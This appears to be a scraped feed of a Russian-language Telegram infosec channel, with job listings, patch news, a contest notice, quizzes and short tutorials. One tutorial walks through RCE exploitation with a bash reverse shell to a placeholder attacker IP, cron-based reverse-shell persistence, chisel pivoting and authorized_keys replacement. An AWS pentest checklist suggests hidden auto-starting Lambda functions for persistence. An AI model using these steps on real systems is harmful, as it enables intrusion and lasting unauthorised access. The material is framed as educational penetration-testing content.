CIA, или триада ЦРУ, — это модель политики ИБ компании.
• конфиденциальность — это перечень нормативов, которые ограничивают доступ к информации компании;
• целостность — гарантия достоверности и точности информации;
• доступность — возможность сотрудникам с правом доступа пользоваться данными.
👍 — если уже знал/а ответ
🌚 — узнал/а новое
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9🌚9🔥1
🔥 Конкурс: 30 000 ₽ за самую смешную IT-новость
Напоминаем о конкурсе «Библиотеки программиста»: напишите самую смешную версию реальной новости про технологии.
👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.
🎁 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе
🏆 Как будем оценивать:
Мы выложим новости всех участников в одном из наших телеграм-каналов. Те новости, которые наберут больше всего охвата, войдут в шорт-лист. Из шорт-листа подписчики и жюри выберут победителя.
📅 Сроки: прием новостей до 11 мая включительно
Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8
Осталась неделя — ждем ваших новостей!
Напоминаем о конкурсе «Библиотеки программиста»: напишите самую смешную версию реальной новости про технологии.
👾 Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переписываете ее так, чтобы смеялись все.
3. Получаете деньги и славу.
🎁 Призы:
- 1 место: 30 000 ₽ + статус ведущего нового юмористического IT-канала
- 2 и 3 место: по 5 000 ₽ + вечный почет в IT-сообществе
🏆 Как будем оценивать:
Мы выложим новости всех участников в одном из наших телеграм-каналов. Те новости, которые наберут больше всего охвата, войдут в шорт-лист. Из шорт-листа подписчики и жюри выберут победителя.
📅 Сроки: прием новостей до 11 мая включительно
Для участия отправьте свою смешную новость в гугл-форму: https://forms.gle/6YShjgfiycfJ53LX8
Осталась неделя — ждем ваших новостей!
Google Docs
Конкурс на самую смешную IT-новость
Библиотека программиста запускает конкурс, который взорвет вашу ленту: создайте самую смешную альтернативную версию реальной IT-новости!
Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переворачиваете её с ног на голову, чтобы смеялись…
Правила просты:
1. Берете настоящую новость из мира технологий.
2. Переворачиваете её с ног на голову, чтобы смеялись…
👍2🔥2❤1
Middle/Senior Application Security Engineer — от 250 000 ₽, удаленно (Москва)
Инженер по информационной безопасности — от 160 000 ₽, офис (Екатеринбург)
Pentester в RedTeam команду — 150 000 - 300 000 ₽, удаленно (Москва)
Специалист по информационной безопасности — от 157 500 ₽ , офис (Казань)
Information Security Specialist (Middle) — офис (Санкт-Петербург)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🔥2❤1
Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.
nmap -p 80,443 --script http-vuln* <target_ip>
— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:
curl "http://target.com/test.php?cmd=id"
⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.
Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.
# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'
—
python3 -c 'import socket,os,...'
—
php -r '...reverse shell...'
— perl, nc -e, curl | sh
— в зависимости от окруженияnc -lvnp 4444
Например, chisel:
# На атакующей машине
chisel server -p 8000 --reverse
# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks
⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)
Настрой файл /etc/proxychains.conf на:
socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24
⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.
- cronjob:
* * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1
- systemd:
.service
с автозапуском- загрузка агента
Metasploit
- использование
ssh-keygen
и подмена .ssh/authorized_keys
🧠 Примечания:
• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.
⚠️ Disclaimer:
Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8😁2❤1🔥1
Google выпустила майский патч безопасности Android — устранил 46 уязвимостей, но одна из них уже используется в атаках.
CVE-2025-27363 (CVSS 8.1) — критическая дыра в библиотеке FreeType, позволяет выполнить код без взаимодействия с пользователем. Ошибка устранена в FreeType 2.13.0+.
Обновление от 5 мая устраняет также баги в ядре, фреймворке, GPU PowerVR, ARM Mali, модемах MediaTek и чипах Qualcomm.
Теперь Android — это не только прошивка. Безопасность зависит от Google Play Protect и Project Mainline. Проверьте, актуален ли ваш патч
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
😁2🤩1
Эта команда позволяет мониторить файл аутентификации в режиме реального времени, фильтруя события, связанные с SSH:
tail -f /var/log/auth.log | grep ssh
tail -f
— выводит новые строки по мере их появления.grep ssh
— фильтрует только те строки, которые содержат информацию об SSH. Используется для:
• Отслеживания попыток подключения по SSH.
• Выявления неудачных попыток входа.
• Мониторинга активности пользователей.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥2😁2
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3😁2🥱2🔥1
• Зафиксируйте цели, допустимые действия, допустимый ущерб (ROE)
• Определить зону тестирования и уточните какие сервисы используются (EC2, S3, IAM, Lambda и т.д.)
• Включите логирование — CloudTrail, GuardDuty
• Определите публичные сервисы/ресурсы: S3-бакеты, API Gateway, EC2-инстансы
• Проверьте открытые DNS-записи (dig, nslookup, Amass)
• Проверьте на наличие избыточных прав (например, *:* в политиках)
• Поищите роли, которые можно перехватить или эскалировать
• Проверьте учетные данные в переменных среды, Lambda, EC2 UserData
• Найдите публичные бакеты
aws s3 ls s3://bucket-name --no-sign-request
• Проверьте разрешения: чтение, запись, листинг
s3:ListBucket, s3:GetObject
• Попробуйте bucket takeover через DNS или CNAME
• Проанализируйте Security Groups и NACLs: открытые порты, экспонированные сервисы
• Поищите интернал-сервисов через разрешённые VPC endpoints
• Протестируйте API на ошибки (XSS, IDOR, Injection)
• Поищите секреты в ENV, логи, исходный код
• Исследуйте другие регионы, сервисы, связанные аккаунты
• Создайте скрытые Lambda-функции или роли с автоматическим запуском.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2
Сегодня делимся вопросом от подписчика, который хочет понять, как выглядит повседневная работа в профессии этичного хакера — без прикрас и киношных эффектов.
Вот что он пишет:
«Этичный хакер — это больше про поиск уязвимостей или написание отчетов? Какой процент времени тратится на что?»
Что мы советуем:
— Веб: Burp Suite, ffuf
— Сети: Nmap, Metasploit
— AD: BloodHound, CrackMapExec
— Облака: ScoutSuite, Pacu
P.S. Если хотите задать вопрос, заполните нашу гугл-форму. Это займет 5 минут.
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3
Кверти — подкаст о кибербезе без скучных лекций. Его ведут специалист по информационной безопасности и параноик-энтузиаст, который всегда ждёт подвоха.
Они обсуждают, как устроен мир цифровых угроз, на чем ловят пользователей и что на самом деле происходит за кулисами индустрии защиты.
Рекомендуемые выпуски:
Практика, сертификация BSCP, реальные вызовы и влияние на карьеру.
Немного истории появления пентеста, обсуждению личности Кевина Митника и различиям между видами пентеста.
Разница с пентестерами и AppSec, старт в баг-баунти и типичные ошибки.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥2
Если вы ищете работу в ИБ, вакансия — это первое, что говорит о зрелости процессов в компании.
Что в статье:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🥱2❤1🔥1😁1
Please open Telegram to view this post
VIEW IN TELEGRAM
👏2😁2🤩1
«Когда DevOps пишет секьюрность — это как если бы электрик проектировал замок от квартиры. Что-то работает, но только пока грабитель в отпуске.»
Почему DevOps может быть security-инженером:
Почему DevOps ≠ SecOps:
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2👾2❤1
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍1
Вы видите, что кнопка «Удалить пользователя» доступна только администраторам, вы не авторизованы как админ, но знаете URL и параметры.
На другой странице вы нашли следующий HTML-код формы:
<form action="/deleteUser?id=5" method="POST">
Правильный ответ:
Даже если пользователь не видит кнопку, он может:
— Сформировать POST-запрос вручную (через Postman, curl, Burp),
— Создать собственную HTML-форму и отправить её.
Если сервер выполняет запрос без проверки прав доступа — это критическая ошибка авторизации.
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥1
Менеджер по защите ИТ инфраструктуры — гибрид/удаленка (Москва)
Инженер по информационной безопасности (AppSec) — офис/гибрид (Москва)
DevSecOps Engineer — 300 000 — 350 000 ₽, удаленно (Москва)
DevSecOps — удаленно/гибрид (Москва)
Инженер по информационной безопасности — от 310 000 ₽, удаленно (Москва)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3😁1
Цели защиты (Ц, К, А, Н): указывает, какие цели обеспечиваются каждым методом:
Где пригодится шпаргалка:
— На экзаменах по ИБ (например, CompTIA, OSCP, КС1/КС2).
— При составлении методологий для оценки криптозащиты в ИС.
— Во время проведения аудита систем хранения и передачи данных.
— На практике при пентестах для выбора правильных векторов атаки на криптографию.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍3😢1
🔐 Критическое обновление от SAP
SAP выпустила срочное обновление безопасности для устранения опасной уязвимости нулевого дня — CVE-2025-31324, которая уже активно используется злоумышленниками в атаках.
📌 Обновление устраняет 15 уязвимостей, включая критические,
📌 Уязвимость затрагивает системы, используемые в финансовом секторе, производстве, госсекторе и логистике,
📌 Есть риск удаленного выполнения кода и компрометации корпоративных данных.
Что делать:
— Немедленно установить обновления, выпущенные в рамках майского Patch Day от SAP.
— Проверить свои системы на наличие следов эксплуатации.
— Обновить политики реагирования на инциденты.
❗ Задержка с установкой патча может привести к серьёзным последствиям: от утечек данных до простоев критичных бизнес-процессов.
🔗 Источник
🐸 Библиотека хакера
#свежак
SAP выпустила срочное обновление безопасности для устранения опасной уязвимости нулевого дня — CVE-2025-31324, которая уже активно используется злоумышленниками в атаках.
Что делать:
— Немедленно установить обновления, выпущенные в рамках майского Patch Day от SAP.
— Проверить свои системы на наличие следов эксплуатации.
— Обновить политики реагирования на инциденты.
❗ Задержка с установкой патча может привести к серьёзным последствиям: от утечек данных до простоев критичных бизнес-процессов.
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥3👏1
С ростом атак через API, таких как API Abuse и SQL-инъекции, стандартные защиты, включая WAF, становятся недостаточными -> требуется более комплексный подход.
Использование MFA и биометрических методов, таких как отпечатки пальцев и распознавание лиц, снижает риск несанкционированного доступа.
Предоставляйте минимально необходимые права доступа для пользователей и сервисов.
Используйте роли и атрибуты для точного контроля доступа к API.
Используйте решения, такие как Salt Security или Security Vision, для защиты от аномалий и атак.
Проводите аудит с помощью инструментов, таких как OWASP ZAP или Postman, для выявления уязвимостей.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥1🤩1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁5👍3🔥1